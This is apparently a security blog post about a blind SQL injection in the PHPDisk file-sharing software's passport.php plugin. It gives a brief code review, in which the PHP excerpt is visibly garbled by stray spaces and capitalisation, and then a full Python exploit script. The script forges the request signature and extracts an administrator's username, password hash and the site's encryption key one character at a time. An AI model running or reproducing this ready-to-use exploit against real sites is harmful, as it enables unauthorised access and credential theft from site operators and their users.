Phpdisk blind Note & amp; arbitrary Front-End User Login

Code Review

File plugins \ phpdisk_client \ passport. php

$ Str = $ _ SERVER ['query _ string']; if ($ str) {parse_str (base64_decode ($ str )); // trigger function} else {exit ('error param');}/* $ username = trim (gpc ('username', 'G ','')); $ password = trim (gpc ('Password', 'G', ''); $ sign = trim (gpc ('sign', 'G ','')); */if ($ sign! = Strtoupper (md5 ($ action. $ username. $ password) {exit ('no data, Code: 2! ');} $ Username = is_utf8 ()? Convert_str ('gbk', 'utf-8', $ username): $ username; if ($ action = 'passportlogin ') {$ rs = $ db-> fetch_one_array ("select userid, gid, username, password, email from {$ tpf} users where username = '$ username' and password =' $ password' limit 1 "); // overwrite tpf

Phpdisk. py exploit

 

#=============================================================================== # Id :phpdisk.y # Author:Yaseng #=============================================================================== import   sys, urllib2, time, os , Queue, msvcrt, threading,re,base64,md5,hashlib,binascii,cookielib   def cslogo():     print '''   ___  ___  ____  ____  ____  __      __   _  _  / __)/ _ \(  _ \( ___)(  _ \(  )    /__\ ( \/ ) ( (__( (_) ))(_) ))__)  )___/ )(__  /(__)\ \  /  \___)\___/(____/(____)(__)  (____)(__)(__)(__)  Name:phpdisk bind sql injection  exploit  Author:Yaseng [yaseng@uauc.net]  Usage:phpdisk.py  site[www.yaseng.me]   id[1] '''   # show message def msg(text, type=0):     if type == 0:        str_def = "[*]"    elif  type == 1:        str_def = "[+]"    else:        str_def = "[-]";     print str_def + text;   # get url data def get_data(url):     try:       r = urllib2.urlopen(url, timeout=10)       return r.read()     except :      return 0def b(url):      if   get_data(url).find("ssport Err",0) != -1 :         return 0     return 1  def make_plyload(payload):      return   target+"?"+base64.b64encode("username=1&password=1&action=passportlogin&tpf="+payload+"&sign="+md5.new("passportlogin"+"1"+"1").hexdigest().upper())    def get_username():       msg("get  username ...")     global  pass_list     len=0    for i in range(40) :          if  b(make_plyload("pd_users  WHERE 1   and   (SELECT  LENGTH(username)  from  pd_users where userid=%d )= %d  #" % (uid,i))):             len=i             msg("username length:%d" % len,1)             break    global  key_list     key_list=['0','1','2','3','4','5','6','7','8','9']     key_list+=map(chr,range(97,123))     username=""     for i  in range(len) :        for key in key_list :             t=key             if type(key) != int :                 t="0x"+binascii.hexlify(key)             if(b(make_plyload(" pd_users WHERE 1   and   (SELECT  substr(username,%d,1)   from  pd_users  where userid=%d )=%s #" % (i+1,uid,t)))) :              msg("username [%d]:%s" % (i+1,key))              username+=key              break    msg("username:"+username,1)     return  username    def get_password():           pass_list=['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f']      password=""      for i  in range(32) :         for key in pass_list :              t=key              if type(key) != int :                  t="0x"+binascii.hexlify(key)              if(b(make_plyload(" pd_users WHERE 1   and   (SELECT  substr(password,%d,1)     from  pd_users  where userid=%d )= %s #" % (i+1,uid,t)))) :               msg("password [%d]:%s" % (i+1,key))               password+=key               break     msg("username:"+password,1)      return password        def get_encrypt_key():       msg("get encrypt_key ...")     global  pass_list     pass_list=map(chr,range(97,123))     len=0    for i in range(40) :         if  b(make_plyload("pd_users  WHERE 1   and   ( SELECT  LENGTH(value)  from  pd_settings  where        vars=0x656e63727970745f6b6579 )=%d  #23" % i)):             len=i             msg("encrypt_key length:%d" % len,1)             break    global  key_list     key_list=['0','1','2','3','4','5','6','7','8','9']     key_list+=map(chr,range(65,91)+range(97,123))     encrypt_key=""     for i  in range(len) :        for key in key_list :          t=key          if type(key) != int :             t="0x"+binascii.hexlify(key)          if(b(make_plyload(" pd_users WHERE 1   and   ( SELECT  binary(substr(value,%d,1))  from  pd_settings  where        vars=0x656e63727970745f6b6579 )  = %s #" % (i+1,t)))) :           msg("key [%d]:%s" % (i+1,key))           encrypt_key+=key           break    msg("encrypt_key:"+encrypt_key,1)     return  encrypt_key    if __name__ == '__main__':      cslogo()    if len(sys.argv) > 1 :     site=sys.argv[1];     global target     global uid     try :      uid=int(sys.argv[2]);     except :       uid =1    target=site+"/plugins/phpdisk_client/passport.php"    msg("exploit:"+site)    #print get_data(make_plyload(" pd_users WHERE 1   and   ( SELECT  substr(value,2,1)  from  pd_settings  where        vars=0x656e63727970745f6b6579 )  = 9 %23"))     if get_data(target) :        username=get_username()        if len(username) > 0 :          password=get_password()          if len(password) == 32 :             msg("Succeed: username:%s  password:%s" % (username,password),1)     else :        msg("vulnerability  not  exits",2);        exit();

Demo